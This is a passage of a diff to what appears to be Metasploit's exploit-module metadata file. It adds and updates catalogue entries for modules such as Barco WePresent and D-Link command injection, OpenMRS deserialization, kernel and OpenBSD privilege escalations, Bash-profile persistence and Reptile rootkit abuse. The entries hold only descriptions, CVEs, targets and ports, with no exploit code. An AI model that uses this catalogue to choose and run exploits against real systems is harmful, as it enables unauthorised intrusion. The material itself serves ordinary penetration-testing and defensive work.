+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/webmin_packageup_rce": {
    "name": "Webmin Package Updates Remote Command Execution",
    "fullname": "exploit/linux/http/webmin_packageup_rce",
@@ -58779,6 +59063,57 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/http/wepresent_cmd_injection": {
+    "name": "Barco WePresent file_transfer.cgi Command Injection",
+    "fullname": "exploit/linux/http/wepresent_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-04-30",
+    "type": "exploit",
+    "author": [
+      "Jacob Baines"
+    ],
+    "description": "This module exploits an unauthenticated remote command injection\n        vulnerability found in Barco WePresent and related OEM'ed products.\n        The vulnerability is triggered via an HTTP POST request to the\n        file_transfer.cgi endpoint.",
+    "references": [
+      "CVE-2019-3929",
+      "EDB-46786",
+      "URL-https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, armle",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix In-Memory",
+      "Linux Dropper"
+    ],
+    "mod_time": "2020-01-14 07:52:30 +0000",
+    "path": "/modules/exploits/linux/http/wepresent_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/wepresent_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/wipg1000_cmd_injection": {
    "name": "WePresent WiPG-1000 Command Injection",
    "fullname": "exploit/linux/http/wipg1000_cmd_injection",
@@ -59254,7 +59589,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2019-08-02 09:48:53 +0000",
+    "mod_time": "2020-01-16 15:04:57 +0000",
    "path": "/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/abrt_raceabrt_priv_esc",
@@ -59324,7 +59659,7 @@
      "rebel",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "This module exploits a race condition and use-after-free in the\n        packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in\n        the Linux kernel to execute code as root (CVE-2016-8655).\n\n        The bug was initially introduced in 2011 and patched in 2016 in version\n        4.4.0-53.74, potentially affecting a large number of kernels; however\n        this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels\n        4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as\n        Linux Mint.\n\n        The target system must have unprivileged user namespaces enabled,\n        two or more CPU cores, and SMAP must be disabled.\n\n        Bypasses for SMEP and KASLR are included. Failed exploitation\n        may crash the kernel.\n\n        This module has been tested successfully on Linux Mint 17.3 (x86_64);\n        Linux Mint 18 (x86_64); and Ubuntu 16.04.2 (x86_64) with kernel\n        versions 4.4.0-45-generic and 4.4.0-51-generic.",
+    "description": "This module exploits a race condition and use-after-free in the\n        packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in\n        the Linux kernel to execute code as root (CVE-2016-8655).\n\n        The bug was initially introduced in 2011 and patched in 2016 in version\n        4.4.0-53.74, potentially affecting a large number of kernels; however\n        this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels\n        4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as\n        Linux Mint.\n\n        The target system must have unprivileged user namespaces enabled,\n        two or more CPU cores, and SMAP must be disabled.\n\n        Bypasses for SMEP and KASLR are included. Failed exploitation\n        may crash the kernel.\n\n        This module has been tested successfully on\n\n        Linux Mint 17.3 (x86_64);\n        Linux Mint 18 (x86_64);\n        Ubuntu 16.04 (x86_64); and\n        Ubuntu 16.04.2 (x86_64).",
    "references": [
      "EDB-40871",
      "CVE-2016-8655",
@@ -59349,7 +59684,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2019-11-03 00:33:24 +0000",
+    "mod_time": "2020-01-19 11:51:01 +0000",
    "path": "/modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/af_packet_chocobo_root_priv_esc",
@@ -59502,7 +59837,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-04-26 13:11:40 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/linux/local/apt_package_manager_persistence.rb",
    "is_install_path": true,
    "ref_name": "linux/local/apt_package_manager_persistence",
@@ -59594,7 +59929,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2018-08-20 17:51:41 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/linux/local/autostart_persistence.rb",
    "is_install_path": true,
    "ref_name": "linux/local/autostart_persistence",
@@ -59605,6 +59940,45 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/local/bash_profile_persistence": {
+    "name": "Bash Profile Persistence",
+    "fullname": "exploit/linux/local/bash_profile_persistence",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "1989-06-08",
+    "type": "exploit",
+    "author": [
+      "Michael Long <bluesentinel@protonmail.com>"
+    ],
+    "description": "\"\n          This module writes an execution trigger to the target's Bash profile.\n          The execution trigger executes a call back payload whenever the target\n          user opens a Bash terminal. A handler is not run automatically, so you\n          must configure an appropriate exploit/multi/handler to receive the callback.\n        \"",
+    "references": [
+      "URL-https://attack.mitre.org/techniques/T1156/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-01-14 20:47:27 +0000",
+    "path": "/modules/exploits/linux/local/bash_profile_persistence.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/bash_profile_persistence",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/local/blueman_set_dhcp_handler_dbus_priv_esc": {
    "name": "blueman set_dhcp_handler D-Bus Privilege Escalation",
    "fullname": "exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc",
@@ -59665,7 +60039,7 @@
      "jannh <jannh@google.com>",
      "h00die <mike@shorebreaksecurity.com>"
    ],
-    "description": "Linux kernel 4.4 < 4.5.5 extended Berkeley Packet Filter (eBPF)\n        does not properly reference count file descriptors, resulting\n        in a use-after-free, which can be abused to escalate privileges.\n\n        The target system must be compiled with `CONFIG_BPF_SYSCALL`\n        and must not have `kernel.unprivileged_bpf_disabled` set to 1.\n\n        This module has been tested successfully on:\n\n        Ubuntu 16.04 (x64) kernel 4.4.0-21-generic (default kernel);\n        Ubuntu 16.04 (x64) kernel 4.4.0-38-generic;\n        Ubuntu 16.04 (x64) kernel 4.4.0-42-generic;\n        Ubuntu 16.04 (x64) kernel 4.4.0-98-generic;\n        Ubuntu 16.04 (x64) kernel 4.4.0-140-generic.",
+    "description": "Linux kernel 4.4 < 4.5.5 extended Berkeley Packet Filter (eBPF)\n        does not properly reference count file descriptors, resulting\n        in a use-after-free, which can be abused to escalate privileges.\n\n        The target system must be compiled with `CONFIG_BPF_SYSCALL`\n        and must not have `kernel.unprivileged_bpf_disabled` set to 1.\n\n        Note, this module will overwrite the first few lines\n        of `/etc/crontab` with a new cron job. The job will\n        need to be manually removed.\n\n        This module has been tested successfully on Ubuntu 16.04 (x64)\n        kernel 4.4.0-21-generic (default kernel).",
    "references": [
      "BID-90309",
      "CVE-2016-4557",
@@ -59690,7 +60064,7 @@
      "Linux x86",
      "Linux x64"
    ],
-    "mod_time": "2018-12-15 05:39:50 +0000",
+    "mod_time": "2019-12-26 16:21:44 +0000",
    "path": "/modules/exploits/linux/local/bpf_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/bpf_priv_esc",
@@ -60384,7 +60758,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2020-01-16 15:04:57 +0000",
    "path": "/modules/exploits/linux/local/libuser_roothelper_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/libuser_roothelper_priv_esc",
@@ -60470,16 +60844,21 @@
    "type": "exploit",
    "author": [
      "h00die <mike@stcyrsecurity.com>",
-      "vnik"
+      "vnik",
+      "Jesse Hertz",
+      "Tim Newsham"
    ],
-    "description": "This module attempts to exploit a netfilter bug on Linux Kernels before 4.6.3, and currently\n          only works against Ubuntu 16.04 (not 16.04.1) with kernel\n          4.4.0-21-generic.\n          Several conditions have to be met for successful exploitation:\n          Ubuntu:\n          1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)\n          2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile\n          Kernel 4.4.0-31-generic and newer are not vulnerable.\n\n          We write the ascii files and compile on target instead of locally since metasm bombs for not\n          having cdefs.h (even if locally installed)",
+    "description": "This module attempts to exploit a netfilter bug on Linux Kernels before 4.6.3, and currently\n          only works against Ubuntu 16.04 (not 16.04.1) with kernel 4.4.0-21-generic.\n\n          Several conditions have to be met for successful exploitation:\n          Ubuntu:\n          1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)\n          2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile\n          Kernel 4.4.0-31-generic and newer are not vulnerable. This exploit does not bypass SMEP/SMAP.\n\n          We write the ascii files and compile on target instead of locally since metasm bombs for not\n          having cdefs.h (even if locally installed)",
    "references": [
      "EDB-40049",
      "CVE-2016-4997",
-      "URL-http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c"
+      "CVE-2016-4998",
+      "URL-https://www.openwall.com/lists/oss-security/2016/06/24/5",
+      "URL-http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c",
+      "URL-https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6e94e0cfb0887e4013b3b930fa6ab1fe6bb6ba91"
    ],
    "platform": "Linux",
-    "arch": "x86",
+    "arch": "x86, x64",
    "rport": null,
    "autofilter_ports": [

@@ -60490,7 +60869,7 @@
    "targets": [
      "Ubuntu"
    ],
-    "mod_time": "2018-10-10 14:12:29 +0000",
+    "mod_time": "2019-12-15 07:17:42 +0000",
    "path": "/modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb",
    "is_install_path": true,
    "ref_name": "linux/local/netfilter_priv_esc_ipv4",
@@ -60498,6 +60877,12 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ]
    },
    "needs_cleanup": true
  },
@@ -60852,7 +61237,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2018-11-04 05:28:32 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/linux/local/rc_local_persistence.rb",
    "is_install_path": true,
    "ref_name": "linux/local/rc_local_persistence",
@@ -60863,11 +61248,69 @@
    },
    "needs_cleanup": null
  },
-  "exploit_linux/local/rds_priv_esc": {
-    "name": "Reliable Datagram Sockets (RDS) Privilege Escalation",
-    "fullname": "exploit/linux/local/rds_priv_esc",
+  "exploit_linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc": {
+    "name": "Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation",
+    "fullname": "exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc",
    "aliases": [

+    ],
+    "rank": 400,
+    "disclosure_date": "2018-11-01",
+    "type": "exploit",
+    "author": [
+      "Mohamed Ghannam",
+      "Jann Horn",
+      "wbowling",
+      "bcoles <bcoles@gmail.com>",
+      "nstarke"
+    ],
+    "description": "This module attempts to gain root privileges on Linux systems by abusing\n        a NULL pointer dereference in the `rds_atomic_free_op` function in the\n        Reliable Datagram Sockets (RDS) kernel module (rds.ko).\n\n        Successful exploitation requires the RDS kernel module to be loaded.\n        If the RDS module is not blacklisted (default); then it will be loaded\n        automatically.\n\n        This exploit supports 64-bit Ubuntu Linux systems, including distributions\n        based on Ubuntu, such as Linux Mint and Zorin OS.\n\n        Target offsets are available for:\n\n        Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116-generic; and\n        Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54-generic.\n\n        This exploit does not bypass SMAP. Bypasses for SMEP and KASLR are included.\n        Failed exploitation may crash the kernel.\n\n        This module has been tested successfully on various 4.4 and 4.8 kernels.",
+    "references": [
+      "CVE-2018-5333",
+      "CVE-2019-9213",
+      "BID-102510",
+      "URL-https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4",
+      "URL-https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c",
+      "URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2",
+      "URL-https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-5333.html",
+      "URL-https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7d11f77f84b27cef452cee332f4e469503084737",
+      "URL-https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=15133f6e67d8d646d0744336b4daa3135452cb0d",
+      "URL-https://github.com/bcoles/kernel-exploits/blob/master/CVE-2018-5333/cve-2018-5333.c"
+    ],
+    "platform": "Linux",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2020-01-18 08:34:52 +0000",
+    "path": "/modules/exploits/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ]
+    },
+    "needs_cleanup": true
+  },
+  "exploit_linux/local/rds_rds_page_copy_user_priv_esc": {
+    "name": "Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation",
+    "fullname": "exploit/linux/local/rds_rds_page_copy_user_priv_esc",
+    "aliases": [
+      "exploit/linux/local/rds_priv_esc"
    ],
    "rank": 500,
    "disclosure_date": "2010-10-20",
@@ -60876,7 +61319,7 @@
      "Dan Rosenberg",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "This module exploits a vulnerability in the rds_page_copy_user function\n        in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8\n        to execute code as root (CVE-2010-3904).\n\n        This module has been tested successfully on Fedora 13 (i686) with\n        kernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64)\n        with kernel version 2.6.32-21-generic.",
+    "description": "This module exploits a vulnerability in the `rds_page_copy_user` function\n        in `net/rds/page.c` (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8\n        to execute code as root (CVE-2010-3904).\n\n        This module has been tested successfully on:\n\n        Fedora 13 (i686) kernel version 2.6.33.3-85.fc13.i686.PAE; and\n        Ubuntu 10.04 (x86_64) with kernel version 2.6.32-21-generic.",
    "references": [
      "EDB-15285",
      "CVE-2010-3904",
@@ -60899,16 +61342,25 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2019-01-10 19:19:14 +0000",
-    "path": "/modules/exploits/linux/local/rds_priv_esc.rb",
+    "mod_time": "2019-12-22 10:20:00 +0000",
+    "path": "/modules/exploits/linux/local/rds_rds_page_copy_user_priv_esc.rb",
    "is_install_path": true,
-    "ref_name": "linux/local/rds_priv_esc",
+    "ref_name": "linux/local/rds_rds_page_copy_user_priv_esc",
    "check": true,
    "post_auth": false,
    "default_credential": false,
    "notes": {
      "AKA": [
        "rds-fail.c"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
      ]
    },
    "needs_cleanup": true
@@ -60957,6 +61409,53 @@
    },
    "needs_cleanup": true
  },
+  "exploit_linux/local/reptile_rootkit_reptile_cmd_priv_esc": {
+    "name": "Reptile Rootkit reptile_cmd Privilege Escalation",
+    "fullname": "exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2018-10-29",
+    "type": "exploit",
+    "author": [
+      "f0rb1dd3n",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n        to gain root privileges using the `root` command.\n\n        This module has been tested successfully with Reptile from `master`\n        branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).",
+    "references": [
+      "URL-https://github.com/f0rb1dd3n/Reptile",
+      "URL-https://github.com/f0rb1dd3n/Reptile/wiki/Usage"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2019-12-11 06:48:51 +0000",
+    "path": "/modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/reptile_rootkit_reptile_cmd_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_linux/local/service_persistence": {
    "name": "Service Persistence",
    "fullname": "exploit/linux/local/service_persistence",
@@ -61476,7 +61975,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-04-30 06:25:48 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/linux/local/yum_package_manager_persistence.rb",
    "is_install_path": true,
    "ref_name": "linux/local/yum_package_manager_persistence",
@@ -63093,7 +63592,7 @@
    "path": "/modules/exploits/linux/redis/redis_unauth_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/redis/redis_unauth_exec",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -63492,7 +63991,7 @@
      "linux x64",
      "linux x86"
    ],
-    "mod_time": "2018-12-14 22:27:11 +0000",
+    "mod_time": "2019-11-01 19:20:22 +0000",
    "path": "/modules/exploits/linux/smtp/haraka.py",
    "is_install_path": true,
    "ref_name": "linux/smtp/haraka",
@@ -64196,6 +64695,97 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/upnp/dlink_dir859_exec_ssdpcgi": {
+    "name": "D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi",
+    "fullname": "exploit/linux/upnp/dlink_dir859_exec_ssdpcgi",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-12-24",
+    "type": "exploit",
+    "author": [
+      "s1kr10s",
+      "secenv"
+    ],
+    "description": "D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.",
+    "references": [
+      "CVE-2019-20215",
+      "URL-https://medium.com/@s1kr10s/2e799acb8a73"
+    ],
+    "platform": "Linux",
+    "arch": "mipsbe",
+    "rport": "1900",
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2020-02-05 11:53:51 +0000",
+    "path": "/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb",
+    "is_install_path": true,
+    "ref_name": "linux/upnp/dlink_dir859_exec_ssdpcgi",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
+  "exploit_linux/upnp/dlink_dir859_subscribe_exec": {
+    "name": "D-Link DIR-859 Unauthenticated Remote Command Execution",
+    "fullname": "exploit/linux/upnp/dlink_dir859_subscribe_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-12-24",
+    "type": "exploit",
+    "author": [
+      "Miguel Mendez Z., <Miguel Mendez Z., @s1kr10s>",
+      "Pablo Pollanco P."
+    ],
+    "description": "D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP\n        interface. The vulnerability exists in /gena.cgi (function genacgi_main() in\n        /htdocs/cgibin), which is accessible without credentials.",
+    "references": [
+      "CVE-2019-17621",
+      "URL-https://medium.com/@s1kr10s/d94b47a15104"
+    ],
+    "platform": "Linux",
+    "arch": "mipsbe",
+    "rport": "49152",
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-01-13 13:18:43 +0000",
+    "path": "/modules/exploits/linux/upnp/dlink_dir859_subscribe_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/upnp/dlink_dir859_subscribe_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/upnp/dlink_upnp_msearch_exec": {
    "name": "D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection",
    "fullname": "exploit/linux/upnp/dlink_upnp_msearch_exec",
@@ -72142,6 +72732,59 @@
    },
    "needs_cleanup": null
  },
+  "exploit_multi/http/openmrs_deserialization": {
+    "name": "OpenMRS Java Deserialization RCE",
+    "fullname": "exploit/multi/http/openmrs_deserialization",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-02-04",
+    "type": "exploit",
+    "author": [
+      "Nicolas Serra",
+      "mpgn",
+      "Shelby Pace"
+    ],
+    "description": "OpenMRS is an open-source platform that supplies\n        users with a customizable medical record system.\n\n        There exists an object deserialization vulnerability\n        in the `webservices.rest` module used in OpenMRS Platform.\n        Unauthenticated remote code execution can be achieved\n        by sending a malicious XML payload to a Rest API endpoint\n        such as `/ws/rest/v1/concept`.\n\n        This module uses an XML payload generated with Marshalsec\n        that targets the ImageIO component of the XStream library.\n\n        Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java\n        8 and Java 9.",
+    "references": [
+      "CVE-2018-19276",
+      "URL-https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607",
+      "URL-https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization",
+      "URL-https://github.com/mpgn/CVE-2018-19276/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "x86, x64",
+    "rport": 8081,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux"
+    ],
+    "mod_time": "2019-12-04 12:17:35 +0000",
+    "path": "/modules/exploits/multi/http/openmrs_deserialization.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/openmrs_deserialization",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_multi/http/openx_backdoor_php": {
    "name": "OpenX Backdoor PHP Code Execution",
    "fullname": "exploit/multi/http/openx_backdoor_php",
@@ -76530,7 +77173,7 @@
      "Unix (CMD In-Memory)",
      "Windows (CMD In-Memory)"
    ],
-    "mod_time": "2019-12-10 12:10:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/multi/http/vbulletin_widgetconfig_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/vbulletin_widgetconfig_rce",
@@ -80213,7 +80856,7 @@
      "URL-https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/",
      "URL-https://iwantmore.pizza/posts/amsi.html"
    ],
-    "platform": "Linux,PHP,Python,Windows",
+    "platform": "Linux,OSX,PHP,Python,Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": [
@@ -80229,9 +80872,10 @@
      "Regsvr32",
      "pubprn",
      "PSH (Binary)",
-      "Linux"
+      "Linux",
+      "Mac OS X"
    ],
-    "mod_time": "2019-12-09 11:21:52 +0000",
+    "mod_time": "2020-01-09 15:02:04 +0000",
    "path": "/modules/exploits/multi/script/web_delivery.rb",
    "is_install_path": true,
    "ref_name": "multi/script/web_delivery",
@@ -80633,6 +81277,52 @@
    },
    "needs_cleanup": null
  },
+  "exploit_openbsd/local/dynamic_loader_chpass_privesc": {
+    "name": "OpenBSD Dynamic Loader chpass Privilege Escalation",
+    "fullname": "exploit/openbsd/local/dynamic_loader_chpass_privesc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-12-11",
+    "type": "exploit",
+    "author": [
+      "Qualys",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module exploits a vulnerability in the OpenBSD `ld.so`\n        dynamic loader (CVE-2019-19726).\n\n        The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH`\n        environment variable when set with approximately `ARG_MAX` colons.\n\n        This can be abused to load `libutil.so` from an untrusted path,\n        using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid\n        executable, resulting in privileged code execution.\n\n        This module has been tested successfully on:\n\n        OpenBSD 6.1 (amd64); and\n        OpenBSD 6.6 (amd64)",
+    "references": [
+      "CVE-2019-19726",
+      "EDB-47780",
+      "URL-https://blog.qualys.com/laws-of-vulnerabilities/2019/12/11/openbsd-local-privilege-escalation-vulnerability-cve-2019-19726",
+      "URL-https://www.qualys.com/2019/12/11/cve-2019-19726/local-privilege-escalation-openbsd-dynamic-loader.txt",
+      "URL-https://www.openwall.com/lists/oss-security/2019/12/11/9",
+      "URL-https://github.com/bcoles/local-exploits/blob/master/CVE-2019-19726/openbsd-dynamic-loader-chpass",
+      "URL-https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/013_ldso.patch.sig"
+    ],
+    "platform": "BSD,Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2019-12-22 08:46:43 +0000",
+    "path": "/modules/exploits/openbsd/local/dynamic_loader_chpass_privesc.rb",
+    "is_install_path": true,
+    "ref_name": "openbsd/local/dynamic_loader_chpass_privesc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": true
+  },
  "exploit_osx/afp/loginext": {
    "name": "AppleFileServer LoginExt PathName Overflow",
    "fullname": "exploit/osx/afp/loginext",
@@ -81420,7 +82110,7 @@

    ],
    "platform": "OSX",
-    "arch": "",
+    "arch": "x86, x64",
    "rport": null,
    "autofilter_ports": [

@@ -81431,7 +82121,7 @@
    "targets": [
      "Mac OS X"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-28 17:16:45 +0000",
    "path": "/modules/exploits/osx/local/persistence.rb",
    "is_install_path": true,
    "ref_name": "osx/local/persistence",
@@ -84646,7 +85336,7 @@
    "targets": [
      "@(#)version.c       5.51 (Berkeley) 5/2/86"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2019-12-23 19:02:13 +0000",
    "path": "/modules/exploits/unix/smtp/morris_sendmail_debug.rb",
    "is_install_path": true,
    "ref_name": "unix/smtp/morris_sendmail_debug",
@@ -90171,70 +90861,6 @@
    },
    "needs_cleanup": null
  },
-  "exploit_unix/webapp/webmin_backdoor": {
-    "name": "Webmin password_change.cgi Backdoor",
-    "fullname": "exploit/unix/webapp/webmin_backdoor",
-    "aliases": [
-
-    ],
-    "rank": 600,
-    "disclosure_date": "2019-08-10",
-    "type": "exploit",
-    "author": [
-      "AkkuS",
-      "wvu <wvu@metasploit.com>"
-    ],
-    "description": "This module exploits a backdoor in Webmin versions 1.890 through 1.920.\n        Only the SourceForge downloads were backdoored, but they are listed as\n        official downloads on the project's site.\n\n        Unknown attacker(s) inserted Perl qx statements into the build server's\n        source code on two separate occasions: once in April 2018, introducing\n        the backdoor in the 1.890 release, and in July 2018, reintroducing the\n        backdoor in releases 1.900 through 1.920.\n\n        Only version 1.890 is exploitable in the default install. Later affected\n        versions require the expired password changing feature to be enabled.",
-    "references": [
-      "CVE-2019-15107",
-      "URL-http://www.webmin.com/exploit.html",
-      "URL-https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html",
-      "URL-https://blog.firosolutions.com/exploits/webmin/",
-      "URL-https://github.com/webmin/webmin/issues/947"
-    ],
-    "platform": "Linux,Unix",
-    "arch": "cmd, x86, x64",
-    "rport": 10000,
-    "autofilter_ports": [
-      80,
-      8080,
-      443,
-      8000,
-      8888,
-      8880,
-      8008,
-      3000,
-      8443
-    ],
-    "autofilter_services": [
-      "http",
-      "https"
-    ],
-    "targets": [
-      "Automatic (Unix In-Memory)",
-      "Automatic (Linux Dropper)"
-    ],
-    "mod_time": "2019-08-21 17:42:54 +0000",
-    "path": "/modules/exploits/unix/webapp/webmin_backdoor.rb",
-    "is_install_path": true,
